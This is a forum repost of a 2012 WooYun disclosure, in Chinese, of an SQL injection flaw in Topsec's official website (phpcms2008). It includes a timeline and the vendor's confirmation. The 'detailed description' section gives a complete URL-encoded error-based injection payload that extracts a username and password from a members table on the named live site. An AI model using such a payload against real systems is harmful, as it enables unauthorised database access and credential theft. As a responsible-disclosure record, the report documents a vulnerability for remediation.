标题:
天融信官网某SQL注射漏洞
[打印本页]
作者:
linda
时间:
2015-1-6 15:59
标题:
天融信官网某SQL注射漏洞
漏洞概要
缺陷编号:
WooYun-2012-06387
漏洞标题: 天融信官网某注射
相关厂商:
天融信
漏洞作者:
kobin97
提交时间: 2012-04-25 20:45
公开时间: 2012-06-09 20:46
漏洞类型: SQL注射漏洞
危害等级: 低
自评Rank: 5
漏洞状态: 厂商已经确认
漏洞来源:
http://www.wooyun.org
Tags标签:
第三方不可信程序
php+数字类型注射
参数未过滤
phpcms
漏洞详情披露状态:
2012-04-25: 细节已通知厂商并且等待厂商处理中
2012-04-26: 厂商已经确认,细节仅向厂商公开
2012-05-06: 细节向核心白帽子及相关领域专家公开
2012-05-16: 细节向普通白帽子公开
2012-05-26: 细节向实习白帽子公开
2012-06-09: 细节向公众公开
简要描述:
天融信官网某注射
详细说明:
phpcms2008
暴错注射
http://www.topsec.com.cn/flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28
*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23
漏洞证明:
修复方案:
您懂得!
版权声明:转载请注明来源
kobin97
@
乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2012-04-26 08:17
厂商回复:
第三方程序的问题,感谢kobin97报告此漏洞。
最新状态:
暂无
原文:
http://www.wooyun.org/bugs/wooyun-2010-06387
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0